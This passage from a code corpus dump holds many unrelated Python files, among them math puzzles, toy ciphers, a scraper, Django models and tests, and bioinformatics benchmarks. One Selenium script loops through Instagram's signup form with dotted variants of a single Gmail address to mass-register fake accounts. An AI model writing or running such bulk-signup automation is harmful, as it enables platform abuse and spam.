continue
elif rot==buff:
primeList.pop(i)
found=found+1
break
elif rot < buff:
found = n
break
elif i == len(primeList)-1:
found = n
break
if found == n:
break
n = found
return n
def main():
    """Project Euler 35 driver: count circular primes below one million."""
    primes = get_allPrimes(1000000)
    # Parenthesised print works under both Python 2 and 3; the original
    # bare print statements were Python-2-only.
    print(len(primes))
    print(testAll(primes))
if __name__=="__main__":
    main()
|
12,423 | dd781ec8c13eae5a15225e5e295aa0e35e1ac2b1 | __author__ = 'fernando'
def about():
    """Permanently redirect the legacy about URL to its new slug."""
    headers = {"Location": "/sobre/VPCrvCkAAPE-I8ch"}
    body = ""
    status = 301
    return body, status, headers
12,424 | d135c13140f1d472dfe377418f0af1fcab093b6e | import pyttsx3
class encryption:
    """Toy cipher demos: Caesar shift and Vigenere; both print their result."""
    def __init__(self, otext, keyword, number):
        self.otext = otext      # plaintext to encrypt
        self.keyword = keyword  # Vigenere key
        self.number=number      # Caesar rotation amount
    def caesar(self,otext,number):
        """Print *otext* Caesar-shifted by *number*, preserving case.

        NOTE(review): deque.rotate(number) rotates right, so a positive
        number maps 'A' to the letter *number* places earlier in the
        alphabet — confirm the intended shift direction.
        """
        import string
        import collections
        upper= collections.deque(string.ascii_uppercase)
        lower= collections.deque(string.ascii_lowercase)
        upper.rotate(number)
        lower.rotate(number)
        upper = ''.join(list(upper))
        lower = ''.join(list(lower))
        print (otext.translate(str.maketrans(string.ascii_uppercase, upper)).translate(str.maketrans(string.ascii_lowercase, lower)))
    def vigenerecipher(self, otext, keyword):
        """Print the Vigenere encryption of *otext* under *keyword*."""
        key = keyword
        kl = list(keyword)
        # Strip whitespace so the key lines up against letters only.
        text = "".join(otext.split())
        if len(text) != len(keyword):
            # Repeat the keyword until it covers the whole text.
            for i in range(len(text) - len(keyword)):
                key = key + kl[i]
                kl.append(kl[i])
        cipheredtext = ""
        letters = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s",
                   "t", "u", "v",
                   "w", "x", "y", "z"]
        for i in range(len(text)):
            cipher = 0
            ltpos = 0
            lkpos = 0
            if text[i].isalpha() == True:
                if text[i].islower() == True:
                    for j in range(len(letters)):
                        if text[i] == letters[j]:
                            ltpos = j
                        if key[i] == letters[j]:
                            lkpos = j
                    # Classic Vigenere: ciphertext = (plain + key) mod 26.
                    cipher = ltpos + lkpos
                    cipher = cipher % 26
                    cipheredtext = cipheredtext + letters[cipher]
                elif text[i].isupper() == True:
                    # NOTE(review): this uppercases `letters` in place, so
                    # any lowercase character processed after an uppercase
                    # one no longer matches the (now uppercase) table.
                    for q in range(len(letters)):
                        letters[q] = letters[q].upper()
                    for j in range(len(letters)):
                        if text[i] == letters[j]:
                            ltpos = j
                        if key[i] == letters[j]:
                            lkpos = j
                    cipher = ltpos + lkpos
                    cipher = cipher % 26
                    cipheredtext = cipheredtext + letters[cipher]
            else:
                cipheredtext = cipheredtext + text[i]
        # Re-insert spaces at their original positions in the input.
        for i in range(len(otext)):
            if otext[i] == " ":
                cipheredtext = cipheredtext[:i] + " " + cipheredtext[i:]
        print(cipheredtext)
# Demo: encrypt the same phrase with both ciphers, then speak the original.
f1 = encryption("ATTACKATDAWN", 'LEMON',5)
f1.vigenerecipher("ATTACKATDAWN", "LEMON")
f1.caesar("ATTACKATDAWN",5)
speaker=pyttsx3.init()
speaker.say(f1.otext)
speaker.runAndWait()
|
12,425 | 819191126dc15e8135320c1b11c5eac714e3979a | import re
import requests
import time
class ImagesHelper:
    """Scrape image URLs from jandan.net listing pages into a queue and
    download individual images to disk."""

    # Directory downloaded images are written to.
    SAVE_DIR = "D:\\webCrawling\\"

    def __init__(self, queue, start_page=2100, end_page=2105):
        self.start_page = start_page  # first listing page (inclusive)
        self.end_page = end_page      # last listing page (exclusive)
        self.url_queue = queue        # queue.Queue shared with downloaders

    def get_urls(self):
        """Fetch each listing page and push every <img src> URL onto the queue."""
        for page in range(self.start_page, self.end_page):
            time.sleep(1)  # be polite: at most one page request per second
            targetUrl = "http://jandan.net/ooxx/page-" + str(page) + "#comments"
            # timeout added so a stalled server cannot hang the scraper forever
            html = requests.get(targetUrl, timeout=30).text
            for url in re.findall('<img src="(.*?)"', html, re.S):
                self.url_queue.put(url)

    @staticmethod
    def down_url(url, image_no):
        """Download *url* to SAVE_DIR/<image_no>.<ext>; non-jpg/png URLs
        and network failures are silently skipped (best-effort, matching
        the original behaviour)."""
        print('now downloading:' + url)
        try:
            pic = requests.get(url, timeout=30)
        except Exception:
            return
        # Pick the extension from the URL; anything else is ignored.
        if url.find(".jpg") > 0:
            ext = '.jpg'
        elif url.find(".png") > 0:
            ext = '.png'
        else:
            return
        # `with` closes the file even if the write fails; the original
        # leaked the handle on a failed fp.write().
        with open(ImagesHelper.SAVE_DIR + str(image_no) + ext, 'wb') as fp:
            fp.write(pic.content)
|
12,426 | ebd68e74f9254d8c5452b941b7b6d63fd4bfc0a4 | from django.core.validators import RegexValidator
from django.db import models
WRONG_PHONE = "Phone number must be entered in the format: '+79999999999' or '89999999999'."
class Company(models.Model):
    """A client company; name is indexed for fast lookup."""
    name = models.CharField(max_length=128, db_index=True)
    address = models.CharField(max_length=1024, default='')
    class Meta:
        db_table = 'company'
    def __str__(self):
        return self.name
class Contact(models.Model):
    """A person at a Company, with a validated Russian-format phone number."""
    # Accepts '+7' or '8' followed by exactly ten digits (see WRONG_PHONE).
    phone_regex = RegexValidator(regex=r'^(\+7|8)\d{10}$', message=WRONG_PHONE)
    name = models.CharField(max_length=256)
    company = models.ForeignKey(Company, models.CASCADE, related_name='contacts')
    email = models.EmailField()
    phone = models.CharField(validators=[phone_regex], max_length=12, null=True, blank=True)
    interest = models.CharField(max_length=1024, default='', blank=True)
    class Meta:
        db_table = 'contacts'
|
12,427 | d78956a5bb3233305e5021b1adef39686a9f8bd9 | import ctypes
import time
from sdl2 import *
from numpy import interp
class Joystick():
    """Thin SDL2 wrapper tracking a few axes and buttons of one joystick."""
    def __init__(self):
        SDL_Init(SDL_INIT_JOYSTICK)
        # Axis index -> last reported value (axes 1 and 4 are used here).
        self.axis = {1: 0.0, 4: 0.0}
        # Button index -> pressed state.
        self.button = {5: False, 1: False, 0: False}
    def update(self):
        """Drain the SDL event queue and refresh axis/button state."""
        event = SDL_Event()
        while SDL_PollEvent(ctypes.byref(event)) != 0:
            if event.type == SDL_JOYDEVICEADDED:
                # Open the newly attached joystick so we receive its events.
                self.device = SDL_JoystickOpen(event.jdevice.which)
            elif event.type == SDL_JOYAXISMOTION:
                yval = event.jaxis.value
                #yinter = int(interp(yval, [-32768, 32767], [0,255]))
                #yfinal = interp(yinter, [0, 255], [-1.0, 1.0]) * -1
                # Map the raw signed 16-bit axis value to roughly
                # [-255, 255], inverting the sign of the positive half.
                yinter = 0
                if yval >= 0:
                    yinter = int(interp(yval, [0, 32767], [0,255])) * -1
                elif yval < 0:
                    yinter = int(interp(yval, [-32768, 0], [255, 0]))
                yfinal = yinter
                self.axis[event.jaxis.axis] = yfinal
            elif event.type == SDL_JOYBUTTONDOWN:
                self.button[event.jbutton.button] = True
            elif event.type == SDL_JOYBUTTONUP:
                self.button[event.jbutton.button] = False
if __name__ == "__main__":
joystick = Joystick()
while True:
joystick.update()
time.sleep(0.1)
print("Axis", joystick.axis)
print("Button", joystick.button)
if joystick.button[5]:
print("pressed")
|
12,428 | 26e85e738d81123525cf0aa0740e13daf247ffb7 | def duplicate_remover(word):
"""
>>> duplicate_remover("abbaca")
'ca'
>>> duplicate_remover("azxxzy")
'ay'
"""
stack = []
for t in word:
if len(stack) == 0:
stack.append(t)
elif t == stack[-1]:
stack.pop()
else:
stack.append(t)
return "".join(stack)
if __name__ == '__main__':
    # Run the doctests above when executed as a script.
    from doctest import testmod
    testmod(verbose=True)
|
12,429 | a65d53f5f95c66837759a62bafde9c0720e4fd17 | # -*- coding: utf-8 -*-
#
# Chinese.Update Reversal Sort Fields
# - A FlexTools Module -
#
# Finds the Chinese Reversal Index and uses the Hanzi field and
# Pinyin Numbered fields to populate the Sort field. See the
# documentation below for the Writing System codes.
#
# C D Farrow
# May 2011
#
# Platforms: Python .NET and IronPython
#
from __future__ import unicode_literals
from builtins import str
from FTModuleClass import *
import site
site.addsitedir(r"Lib")
from ChineseUtilities import SortStringDB, ChineseWritingSystems
#----------------------------------------------------------------
# Documentation for the user:
docs = {FTM_Name : "Update Reversal Index Sort Field",
FTM_Version : "4.0",
FTM_ModifiesDB : True,
FTM_Synopsis : "Updates the Chinese sort field in the Chinese Reversal Index. Sorts by pronunciation.",
FTM_Help : r"Doc\Chinese Utilities Help.pdf",
FTM_Description:
"""
This module sets the sort field in the Chinese Reversal Index ('Chinese, Mandarin (China)' (zh-CN))
The sort field (zh-CN-x-zhsort) is generated from the Chinese Hanzi (zh-CN) field and
Pinyin Numbered (zh-CN-x-pyn) field.
The three writing systems mentioned above must be configured in FLEx
under Tools | Configure | Setup Writing Systems. Note that fields using
the old 'cmn' locale are also supported, but this locale code should not be used in
new projects.
The Pinyin tone number field should first be generated from the Hanzi
(zh-CN) field using either the Update_Tonenumber_Fields FLExTools Module
or the BulkEdit_HZ_2_Tonenumber transducer.
The sort field produced by this Module orders Chinese by pronunciation, then
by stroke count, and finally by stroke order. This follows the ordering in
现代汉语词典 (XianDai HanYu CiDian). Thus:
- san < sen < shan < sheng < si < song: 三 < 森 < 山 < 生 < 四 < 送
- lu < lü < luan < lüe: 路 < 绿 < 乱 < 掠
- (stroke count) 录 < 录音 < 路 < 路口
- (stroke order) zhi4 with 8 strokes: 郅 < 制 < 质 < 治
See Chinese Utilities Help.pdf for detailed information on configuration and usage.
""" }
#----------------------------------------------------------------
# The main processing function
UpdatedSortStrings = 0
def UpdateReversalSortFields(project, report, modifyAllowed=False):
    """Update (or, when modifyAllowed is False, only report) the Chinese
    sort field of every entry in the Chinese reversal index; the sort
    string is derived from the Hanzi and Pinyin-tone-number forms via
    SortStringDB.

    NOTE(review): the module-level UpdatedSortStrings counter is never
    reset, so the reported totals accumulate if this function is run
    more than once in a session.
    """
    def __WriteSortString(project, entry):
        global UpdatedSortStrings
        # Note that project is passed to each of these local functions otherwise
        # project is treated as a global and isn't released for garbage collection.
        # That keeps the project locked so FT has to be restarted to use
        # that project again.
        hz = project.ReversalGetForm(entry, ChineseWS)
        tn = project.ReversalGetForm(entry, ChineseTonenumWS)
        ss = project.ReversalGetForm(entry, ChineseSortWS)
        newSortString, msg = SortDB.CalculateSortString(hz, tn, ss)
        if msg:
            report.Warning("  %s: %s" % (hz, msg),
                           project.BuildGotoURL(entry))
        if newSortString is not None:
            report.Info(("  Updating %s: (%s + %s) > %s" if modifyAllowed else
                         "  %s needs updating: (%s + %s) > %s") \
                        % (hz, hz, tn, newSortString))
            if modifyAllowed:
                project.ReversalSetForm(entry, newSortString, ChineseSortWS)
                UpdatedSortStrings += 1
        # (Subentries don't need the sort string)
    # Resolve the three required writing systems (Hanzi, tone-number, sort).
    ChineseWS,\
    ChineseTonenumWS,\
    ChineseSortWS = ChineseWritingSystems(project, report, Hanzi=True, Tonenum=True, Sort=True)
    if not ChineseWS or not ChineseTonenumWS or not ChineseSortWS:
        report.Error("Please read the instructions and configure the necessary writing systems")
        return
    else:
        report.Info("Using writing systems:")
        report.Info("  Hanzi: %s" % project.WSUIName(ChineseWS))
        report.Info("  Tone number Pinyin: %s" % project.WSUIName(ChineseTonenumWS))
        report.Info("  Chinese sort field: %s" % project.WSUIName(ChineseSortWS))
    SortDB = SortStringDB()
    index = project.ReversalIndex(ChineseWS)
    if index:
        report.ProgressStart(index.AllEntries.Count)
        report.Info("Updating sort strings for '%s' reversal index"
                    % project.WSUIName(ChineseWS))
        for entryNumber, entry in enumerate(project.ReversalEntries(ChineseWS)):
            report.ProgressUpdate(entryNumber)
            __WriteSortString(project, entry)
        report.Info(("  %d %s updated" if modifyAllowed else
                     "  %d %s to update") \
                    % (UpdatedSortStrings, "entry" if (UpdatedSortStrings==1) else "entries"))
#----------------------------------------------------------------
# Module entry point registered with the FlexTools framework.
FlexToolsModule = FlexToolsModuleClass(runFunction = UpdateReversalSortFields,
                                       docs = docs)
#----------------------------------------------------------------
if __name__ == '__main__':
    FlexToolsModule.Help()
|
12,430 | aed0d738fab9c3a1d093aea4297273bcaadcb558 |
def main():
    """Read three space-separated integers from stdin and print 'Yes' if
    the two smallest sum exactly to the largest, otherwise 'No'."""
    values = sorted(map(int, input().split()))
    if values[0] + values[1] == values[2]:
        print('Yes')
    else:
        print('No')
if __name__ == "__main__":
    main()
|
12,431 | aec3cd40d6fcba1a6cd80b3565a73c1eca84cc39 | import numpy as np
import sys
def create_Tensor(f):
    """Fill a global tensor from the parsed file rows in `lines`.

    f truthy  -> fill the 4-D interlink tensor `ti`
    f falsy   -> fill the 3-D intralink tensor `t`

    NOTE(review): written for Python 2 — the `/` divisions below are used
    as array indices and would produce floats (and fail) under Python 3.
    The parameter `f` is also rebound as a row index inside the loop.
    """
    counter = 0
    # Tensor for Interlinks
    if(f):
        for i in range(nr):
            counter = counter + 1
            for j in range(nn):
                f = i % nn
                s = j
                l = i / (nn*nl)
                # Reset the within-block counter at each layer-pair boundary.
                if (counter % (nn * nl) == 0):
                    counter = 0
                else:
                    pass
                th = counter / nn
                ti[f][s][th][l] = lines[i][j]
                #print (str([f , s, th, l]) + str(ti[f][s][th][l]))
    else:
        # Tensor for Intralinks
        for i in range(total):
            for j in range(nn):
                f = i % nn
                s = j
                th = i / nn
                t[f][s][th] = lines[i][j]
def Create_Adj_From_Tensor(fl):
    """Flatten the 4-D interlink tensor (fl truthy) or the 3-D intralink
    tensor (fl falsy) into the (nn*nl) x (nn*nl) supra-adjacency matrix
    stored in the module-level array `a`."""
    if fl:
        # Interlinks: block (layer_from, layer_to) of `a` is filled from
        # ti[:, :, layer_to, layer_from].
        for layer_from in range(nl):
            for layer_to in range(nl):
                for row in range(nn):
                    for col in range(nn):
                        a[row + layer_from * nn][col + layer_to * nn] = ti[row][col][layer_to][layer_from]
        print('Interlink Adjacency Matrix Done')
    else:
        # Intralinks: each layer occupies one diagonal block of `a`.
        for layer in range(nl):
            for row in range(nn):
                for col in range(nn):
                    a[layer * nn + row][layer * nn + col] = t[row][col][layer]
def Display_Matrix(a):
    """Print the supra-adjacency matrix row by row.

    NOTE(review): uses Python 2 print statements — this function is a
    syntax error under Python 3.
    """
    for i in range(total):
        for j in range(total):
            print str(a[i][j]) + ' ',
        print ''
    print ('\n')
def check_for_interlinks(r):
    """Classify the input file by its data-row count *r*.

    Returns True when r == nn*nl*nl (one nn-row block per layer pair:
    interlinks present, multiplex network) and False when r == nn*nl
    (intralink blocks only, multilayer network).

    Fix: the original fell off the end and implicitly returned None for
    any other row count; an unexpected count is now reported and treated
    as intralinks-only, which is what downstream truthiness checks
    already assumed for a falsy result.
    """
    if(r == nn*nl*nl):
        print('Interlinks are present and Network is Multiplex Network')
        return True
    elif(r == nn*nl):
        print('Only Intralinks are present and Network is Multilayer Network')
        return False
    print('Warning: unexpected row count ' + str(r) + '; assuming no interlinks')
    return False
# --- Script entry: parse the edge-list file named on the command line ---
filename = sys.argv[1]
file = open(filename, "r")  # NOTE(review): never closed; shadows builtin `file` (Py2)
lines = []
nn = nl = n = l = li = nr = 0
flag = True
# Header rows carry "Nodes <n>" / "Layers <l>"; every other row is data.
for line in file:
    parts = line.split()
    if parts[0] == "Nodes":
        n = parts[1]
    elif parts[0] == "Layers":
        l = parts[1]
    else:
        lines.append(parts)
        nr = nr + 1
#print ('Total Lines in file are' + str (nr))
nn = int(n)
nl = int(l)
total = nn*nl
# Supra-adjacency matrix plus the intra-link and inter-link tensors.
a = np.zeros((total,total))
t = np.zeros((nn,nn,nl))
ti = np.zeros((nn,nn,nl,nl))
flag = check_for_interlinks(nr)
create_Tensor(flag)
Create_Adj_From_Tensor(flag)
Display_Matrix(a)
12,432 | c6da4538c037def6c830de0ddd0791c408e32607 | import bal
# Simple console banking demo; the balance lives in the imported `bal` module.
ch=1
while ch!=4:
    print("1.Check Balance\n2.Deposit \n3.Withdrwal\n4.Exit")
    ch=int(input("Enter your choice\n"))
    if(ch==1):
        print("Balance is",bal.bal)
    if(ch==2):
        amt=int(input("Enter amount for deposit"))
        bal.bal+=amt
        print("updated balance is:",bal.bal)
    if(ch==3):
        amt=int(input("Enter amount for withdrawal"))
        # NOTE(review): this rejects any withdrawal of 1000 or less and
        # never compares against the actual balance — confirm the rule.
        if(amt<=1000):
            print("insufficient balance")
        else:
            bal.bal-=amt
            print("updated balance is:",bal.bal)
    if(ch==4):
        exit()
    ch=ch+1  # NOTE(review): redundant — ch is re-read at the top of the loop.
12,433 | 646113195f6b9a128d38fdb65cd8a222d9771354 | import time
import numpy as np
from schicluster import *
from sklearn.cluster import KMeans, SpectralClustering
from sklearn.metrics.cluster import adjusted_rand_score as ARI
# Chromosome lengths (bp): mm9 = mouse chr1-19, hg19 = human chr1-22 plus X.
mm9dim = [197195432, 181748087, 159599783, 155630120, 152537259, 149517037, 152524553, 131738871, 124076172, 129993255,
          121843856, 121257530, 120284312, 125194864, 103494974, 98319150, 95272651, 90772031, 61342430]
hg19dim = [249250621, 243199373, 198022430, 191154276, 180915260, 171115067, 159138663, 146364022, 141213431, 135534747,
           135006516, 133851895, 115169878, 107349540, 102531392, 90354753, 81195210, 78077248, 59128983, 63025520,
           48129895, 51304566, 155270560]
# File list and labels of dataset Ramani 2017
ctlist = ['HeLa', 'HAP1', 'GM12878', 'K562']
network = [np.loadtxt('1mb_resolution/' + ct + '/sample_list.txt', dtype=np.str) for ct in ctlist]
label = np.array([ctlist[i] for i in range(len(ctlist)) for j in range(len(network[i]))]).astype('U8')
network = np.concatenate(network)
chrom = [str(i + 1) for i in range(22)] + ['X']
chromsize = {chrom[i]: hg19dim[i] for i in range(len(chrom))}
nc = 4  # number of clusters (one per cell type)
# CpG content for each bin
cg = np.loadtxt('hg19/bin/hg19.1mb.bin.CpG.txt', dtype=np.str, skiprows=1, usecols=(0, 9, 11, 12))
cgdata = cg[:, 1:].astype(float)
# CpG density = CpG count / bin length; empty bins (NaN) become 0.
cgdata = cgdata[:, 2] / (cgdata[:, 1] - cgdata[:, 0])
cgdata[np.isnan(cgdata)] = 0.0
chrcg = {c: cgdata[cg[:, 0] == 'chr' + c] for c in chrom}
# Each section below times one embedding method, then scores KMeans (and
# spectral) clusterings against the known labels via Adjusted Rand Index.
# scHiCluster GPU
start_time = time.time()
cluster, embedding = hicluster_gpu(network, chromsize, nc=nc)
print(time.time() - start_time)
[ARI(label, KMeans(n_clusters=nc, n_init=200).fit(embedding[:, :ndim]).labels_) for ndim in [2, 5, 10, 20, 50]]
# scHiCluster CPU
start_time = time.time()
cluster, embedding = hicluster_cpu(network, chromsize, nc=nc, ncpus=5)
print(time.time() - start_time)
[ARI(label, KMeans(n_clusters=nc, n_init=200).fit(embedding[:, :ndim]).labels_) for ndim in [2, 5, 10, 20, 50]]
# PCA
start_time = time.time()
cluster, embedding = raw_pca(network, chromsize, nc=nc)
print(time.time() - start_time)
[ARI(label, KMeans(n_clusters=nc, n_init=200).fit(embedding[:, 1:(ndim + 1)]).labels_) for ndim in [2, 5, 10, 20, 50]]
[ARI(label, SpectralClustering(n_clusters=nc, affinity='nearest_neighbors').fit(embedding[:, 1:(ndim + 1)]).labels_) for
 ndim in [2, 5, 10, 20, 50]]
# Downsample reads to uniform the coverage of all the cells before PCA
start_time = time.time()
cluster, embedding = ds_pca(network, chromsize, nc=nc)
print(time.time() - start_time)
[ARI(label, KMeans(n_clusters=nc, n_init=200).fit(embedding[:, :ndim]).labels_) for ndim in [2, 5, 10, 20, 50]]
[ARI(label, SpectralClustering(n_clusters=nc, affinity='nearest_neighbors').fit(embedding[:, :ndim]).labels_) for ndim
 in [2, 5, 10, 20, 50]]
# Use compartment score (PC1) of single cells
start_time = time.time()
cluster, embedding = compartment(network, chromsize, nc=nc)
print(time.time() - start_time)
[ARI(label, KMeans(n_clusters=nc, n_init=200).fit(embedding[:, :ndim]).labels_) for ndim in [2, 5, 10, 20, 50]]
[ARI(label, SpectralClustering(n_clusters=nc, affinity='nearest_neighbors').fit(embedding[:, :ndim]).labels_) for ndim
 in [2, 5, 10, 20, 50]]
# Use contact-distance decay curve
start_time = time.time()
cluster, embedding = decay(network, chromsize, nc=nc)
print(time.time() - start_time)
[ARI(label, KMeans(n_clusters=nc, n_init=200).fit(embedding[:, :ndim]).labels_) for ndim in [2, 5, 10, 20, 50]]
[ARI(label, SpectralClustering(n_clusters=nc, affinity='nearest_neighbors').fit(embedding[:, :ndim]).labels_) for ndim
 in [2, 5, 10, 20, 50]]
# scHiCluster without linear convolution
start_time = time.time()
cluster, embedding = hicluster_gpu(network, chromsize, nc=nc, pad=0)
print(time.time() - start_time)
[ARI(label, KMeans(n_clusters=nc, n_init=200).fit(embedding[:, :ndim]).labels_) for ndim in [2, 5, 10, 20, 50]]
[ARI(label, SpectralClustering(n_clusters=nc, affinity='nearest_neighbors').fit(embedding[:, :ndim]).labels_) for ndim
 in [2, 5, 10, 20, 50]]
# scHiCluster without random walk
start_time = time.time()
cluster, embedding = hicluster_gpu(network, chromsize, nc=nc, rp=-1)
print(time.time() - start_time)
[ARI(label, KMeans(n_clusters=nc, n_init=200).fit(embedding[:, :ndim]).labels_) for ndim in [2, 5, 10, 20, 50]]
[ARI(label, SpectralClustering(n_clusters=nc, affinity='nearest_neighbors').fit(embedding[:, :ndim]).labels_) for ndim
 in [2, 5, 10, 20, 50]]
# scHiCluster without keeping the top elements
start_time = time.time()
cluster, embedding = hicluster_gpu(network, chromsize, nc=nc, prct=-1)
print(time.time() - start_time)
[ARI(label, KMeans(n_clusters=nc, n_init=200).fit(embedding[:, 1:(ndim + 1)]).labels_) for ndim in [2, 5, 10, 20, 50]]
[ARI(label, SpectralClustering(n_clusters=nc, affinity='nearest_neighbors').fit(embedding[:, 1:(ndim + 1)]).labels_) for
 ndim in [2, 5, 10, 20, 50]]
# NOTE(review): `dataset` is undefined anywhere in this script, so the
# next line raises NameError — define it or inline the path before use.
np.save('/cellar/users/zhoujt1994/projects/scHiC/' + dataset + '/embedding/1mb_pad1_rwr_real.npy', embedding)
# Random walk only
start_time = time.time()
cluster, embedding = hicluster_gpu(network, chromsize, nc=nc, pad=0, prct=-1)
print(time.time() - start_time)
[ARI(label, KMeans(n_clusters=nc, n_init=200).fit(embedding[:, 1:(ndim + 1)]).labels_) for ndim in [2, 5, 10, 20, 50]]
[ARI(label, SpectralClustering(n_clusters=nc, affinity='nearest_neighbors').fit(embedding[:, 1:(ndim + 1)]).labels_) for
 ndim in [2, 5, 10, 20, 50]]
# Linear convolution only
start_time = time.time()
cluster, embedding = hicluster_gpu(network, chromsize, nc=nc, rp=-1, prct=-1)
print(time.time() - start_time)
[ARI(label, KMeans(n_clusters=nc, n_init=200).fit(embedding[:, 1:(ndim + 1)]).labels_) for ndim in [2, 5, 10, 20, 50]]
[ARI(label, SpectralClustering(n_clusters=nc, affinity='nearest_neighbors').fit(embedding[:, 1:(ndim + 1)]).labels_) for
 ndim in [2, 5, 10, 20, 50]]
12,434 | d05902d29984c21e37d079553be4ce5276a3bdcf |
from selenium import webdriver
import time
mails=["akhtamahendra@gmail.com","a.khtamahendra@gmail.com","ak.htamahendra@gmail.com","akh.tamahendra@gmail.com","akht.amahendra@gmail.com","akhta.mahendra@gmail.com","akhtam.ahendra@gmail.com","akhtama.hendra@gmail.com","akhtamah.endra@gmail.com","akhtamahe.ndra@gmail.com"] #Add 10 emails within the quotes
users=["ahmad","zakky","rahman","firhan","noer","mashitoh","ahung","Isabelle","Apolline","Cameron"] #Add 10 usernames within the quotes
names=["schoolworshipper","zetachunk","caiklot_23","broughtfunctional","floridasidereal","roiderbankspolythene","grimacingunique","icehockeyinterfere","polyethenetoyah","rawchickencelery"] #Add 10 names within the quotes
pas="Input Password"
for x in range (0,len(mails)):
browser=webdriver.Firefox()
browser.get("https://instagram.com")
time.sleep(2)
email=browser.find_elements_by_class_name("_qy55y")[0]
name=browser.find_elements_by_class_name("_qy55y")[1]
username=browser.find_elements_by_class_name("_qy55y")[2]
password=browser.find_elements_by_class_name("_qy55y")[3]
email.send_keys(mails[x])
name.send_keys(names[x])
browser.execute_script("document.getElementsByClassName(\"_qy55y\")[2].value=\"\"")
username.send_keys(users[x])
password.send_keys(pas)
time.sleep(2)
browser.find_elements_by_class_name("_1on88")[1].click()
browser.quit()
|
12,435 | 21593bab14cd42ad860f2e01b5d8f93ecb68320a | import os
from django.test import TestCase
from partner.util import load_choices
HERE = os.path.abspath(os.path.dirname(__file__))
# Create your tests here.
class TestChoiceLoader(TestCase):
    """Checks that the bundled US-state file parses into (code, name) pairs."""
    def test_choices_are_loaded(self):
        choices = load_choices(os.path.join(HERE, 'states.txt'), True)
        self.assertEqual(len(choices), 50)
        self.assertIn(('OR', 'Oregon'), choices)
|
12,436 | 26f5ec2d738c2262f91cce8ba0f0f62e28fa5ce2 | from accounts.models import User
from .models import Question, Answer, Tag
import requests
import json
def get_questions():
    """
    Fetch Questions from eosio.stackexchange
    """
    page = 1
    for _ in range(6):
        response = requests.get('https://api.stackexchange.com/2.2/questions?filter=withbody&site=eosio&pagesize=100&page={}'.format(page))
        payload = json.loads(response.text)
        for item in payload['items']:
            user_id = item['owner']['user_id']
            display_name = item['owner']['display_name']
            try:
                owner = User.objects.get(username=user_id, se_display_name=display_name)
            except Exception:
                owner = None
            if owner:
                # Resolve (or create) every tag before building the question.
                tag_objs = [Tag.objects.get_or_create(name=name)[0] for name in item['tags']]
                question = Question.objects.create(
                    owner=owner, se_question_id=item['question_id'], title=item['title'],
                    body=item['body'], se_link=item['link'],
                    is_answered=item['is_answered'], score=item['score'])
                for tag_obj in tag_objs:
                    question.tags.add(tag_obj)
                question.save()
        page += 1
        print(page)
def get_answers():
    """
    Fetch Answers from Stackexchange
    """
    page = 1
    for _ in range(200):  # TODO : Fetch number of all items first
        response = requests.get('http://api.stackexchange.com/2.2/answers?site=eosio&filter=!b1MMEb*6iF.PM5&pagesize=100&page={}'.format(page))
        payload = json.loads(response.text)
        for item in payload['items']:
            user_id = item['owner']['user_id']
            display_name = item['owner']['display_name']
            question_id = item['question_id']
            try:
                owner = User.objects.get(username=user_id, se_display_name=display_name)
                question = Question.objects.get(se_question_id=question_id)
            except Exception:
                owner = None
                question = None
            if owner and question:
                Answer.objects.create(owner=owner, question=question, body=item['body'],
                                      se_question_id=question_id, is_accepted=item['is_accepted'],
                                      se_answer_id=item['answer_id'], score=item['score'])
        page += 1
        print(page)
12,437 | 9ec0eb5c7974388db836106e8848f96e32c902f1 | from __future__ import unicode_literals
from cities_light.models import City
from django.contrib.contenttypes.models import ContentType
from ...example_apps.autocomplete_test_case_app.models import Group, User
from .case import *
class AutocompleteGenericMock(autocomplete_light.AutocompleteGenericBase):
    """Generic autocomplete over two querysets (users and groups, pk < 10)."""
    choices = (
        User.objects.filter(pk__lt=10),
        Group.objects.filter(pk__lt=10),
    )
    # One search-field tuple per queryset, in the same order as `choices`.
    search_fields = (
        ('username', 'email'),
        ('name',),
    )
    limit_choices = 3
class FormMock(forms.Form):
    # Single generic choice field rendered with the mock autocomplete.
    x = autocomplete_light.GenericModelChoiceField(
        widget=autocomplete_light.ChoiceWidget(
            autocomplete=AutocompleteGenericMock))
class AutocompleteGenericTestCase(AutocompleteTestCase):
    """Exercises AutocompleteGenericMock across two content types (User
    and Group): value resolution, request filtering, validation and
    widget round-trips. Fixture values use the
    "<contenttype_pk>-<object_pk>" encoding that
    GenericModelChoiceField expects."""
    autocomplete_mock = AutocompleteGenericMock
    def assert_choices_equal(self, result, test):
        # Generic choices come back as a lazy iterable; compare as a list.
        self.assertEqual(list(result), test['expected'])
    def get_choices_for_values_tests(self):
        """Fixtures for resolving encoded values back into model instances."""
        return (
            {
                'fixture': [
                    '%s-%s' % (self.user_ctype.pk, self.james.pk),
                    '%s-%s' % (self.group_ctype.pk, self.bluesmen.pk),
                ],
                'expected': [
                    self.james,
                    self.bluesmen,
                ]
            },
            {
                'fixture': [
                    '%s-%s' % (self.user_ctype.pk, self.james.pk),
                    '%s-%s' % (self.user_ctype.pk, self.elton.pk),
                    '%s-%s' % (self.group_ctype.pk, self.bluesmen.pk),
                    '%s-%s' % (self.group_ctype.pk, self.emos.pk),
                ],
                'expected': [
                    self.james,
                    self.bluesmen,
                ],
                'name': 'should ignore values that are not in the querysets',
            },
        )
    def get_choices_for_request_tests(self):
        """Fixtures for filtering choices from a GET request query."""
        return (
            {
                'fixture': make_get_request('j'),
                'expected': [
                    self.abe,
                    self.rockers,
                    self.bluesmen,
                ],
            },
            {
                'fixture': make_get_request('q=elton'),
                'expected': [],
                'name': 'should not propose models that are not in the qs',
            },
        )
    def get_validate_tests(self):
        """Fixtures for validating lists of encoded values."""
        return (
            {
                'fixture': [
                    '%s-%s' % (self.user_ctype.pk, self.james.pk),
                    '%s-%s' % (self.group_ctype.pk, self.bluesmen.pk),
                    '%s-%s' % (self.group_ctype.pk, self.emos.pk),
                ],
                'expected': False,
            },
            {
                'fixture': [
                    '%s-%s' % (self.user_ctype.pk, self.james.pk),
                    '%s-%s' % (self.group_ctype.pk, self.bluesmen.pk),
                ],
                'expected': True,
            },
            {
                'fixture': [],
                'expected': True,
            },
            {
                'fixture': ['bla'],
                'expected': False,
            },
            {
                'fixture': ['123123-123123'],
                'expected': False,
            },
        )
    def get_autocomplete_html_tests(self):
        # No HTML-rendering cases for the generic autocomplete.
        return []
    def get_widget_tests(self):
        """Fixtures for form submissions through the ChoiceWidget."""
        return (
            {
                'form_class': FormMock,
                'fixture': 'x=%s-%s' % (
